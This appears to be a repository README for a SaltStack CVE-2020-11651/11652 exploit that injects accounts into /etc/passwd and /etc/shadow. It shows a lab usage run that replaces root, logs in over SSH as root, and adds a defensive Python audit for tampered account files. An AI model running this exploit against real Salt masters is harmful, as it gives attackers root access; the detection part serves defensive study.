# CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.
```python
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Original Exploit Author: Jasper Lievisse Adriaanse
# Modified Author: Drew Alleman
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
#
# Original Source: https://github.com/jasperla/CVE-2020-11651-poc
# Modified Source: https://github.com/Drew-Alleman/CVE-2020-11651
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
```
## Usage
```
$ python3 CVE-2020-11651-11652-add_user.py -m 192.168.158.62 --replace-root -d
[DEBUG] Auth Info Response: ['user', 'UserAuthenticationError', {'root': 'MpZiP+J3yTzjOQ+ILgZ7KN+os/Jadne3sLha7b7kNz2jLBxBC9hDlajSCObG/ZASPF1RfAr9Lrs='}, []]
[DEBUG] Connected to 192.168.158.62:4506
[DEBUG] Removing existing root line from /etc/passwd
[DEBUG] Removing existing root line from /etc/shadow
[DEBUG] Written to /etc/passwd
[DEBUG] Written to /etc/shadow
[INFO] User root:cvQ0OQaXOf8aYi0Ox*eKGPAQ created successfully.
┌──(.venv)─(drew㉿whitehat)-[~/OSCP_LIKE/Linux/Twiggy/exploits]
└─$ sshpass -p 'cvQ0OQaXOf8aYi0Ox*eKGPAQ' ssh root@192.168.158.62
Last login: Sun Mar 30 02:23:06 2025 from 192.168.45.180
[root@twiggy ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@twiggy ~]#
```
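Because the script works by writing account lines into /etc/passwd and /etc/shadow (optionally replacing the root line), a host that ran an affected Salt master can be checked for that footprint. The following is an added example, not code from this repository: it compares current file contents with a known-good shadow baseline, and the function names and sample data are constructed for illustration.

```python
# Added example: audit passwd/shadow content for injected or replaced accounts.
# All sample data below is constructed; hashes are placeholders, not real ones.

def parse(text):
    """Split colon-delimited records, skipping blank lines and comments."""
    return [ln.split(":") for ln in text.splitlines()
            if ln.strip() and not ln.startswith("#")]

def audit_accounts(passwd_text, shadow_text, baseline_shadow_text):
    """Return findings comparing current files with a known-good shadow baseline."""
    findings, seen = [], set()
    for rec in parse(passwd_text):
        if len(rec) != 7:
            findings.append(f"malformed passwd line: {':'.join(rec)}")
            continue
        name, uid = rec[0], rec[2]
        if name in seen:
            findings.append(f"duplicate passwd entry: {name}")
        seen.add(name)
        if uid == "0" and name != "root":
            findings.append(f"extra UID 0 account: {name}")
    baseline = {r[0]: r[1] for r in parse(baseline_shadow_text) if len(r) > 1}
    for rec in parse(shadow_text):
        if len(rec) < 2:
            findings.append(f"malformed shadow line: {':'.join(rec)}")
            continue
        name, pw_hash = rec[0], rec[1]
        if name not in baseline:
            findings.append(f"new shadow entry: {name}")
        elif pw_hash != baseline[name]:
            findings.append(f"password hash changed: {name}")
        if name not in seen:
            findings.append(f"shadow entry without passwd entry: {name}")
    return findings

BASELINE_SHADOW = "root:$6$aaaa$HASH_A:18000:0:99999:7:::\ndaemon:*:18000:0:99999:7:::\n"
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
          "svc:x:0:0::/root:/bin/bash\n")
SHADOW = ("root:$6$bbbb$HASH_B:20000:0:99999:7:::\n"
          "daemon:*:18000:0:99999:7:::\n"
          "svc:$6$cccc$HASH_C:20000:0:99999:7:::\n")

if __name__ == "__main__":
    for finding in audit_accounts(PASSWD, SHADOW, BASELINE_SHADOW):
        print(finding)
```

A legitimate password change also shows up as "password hash changed", so findings need to be reconciled against change records before being treated as compromise.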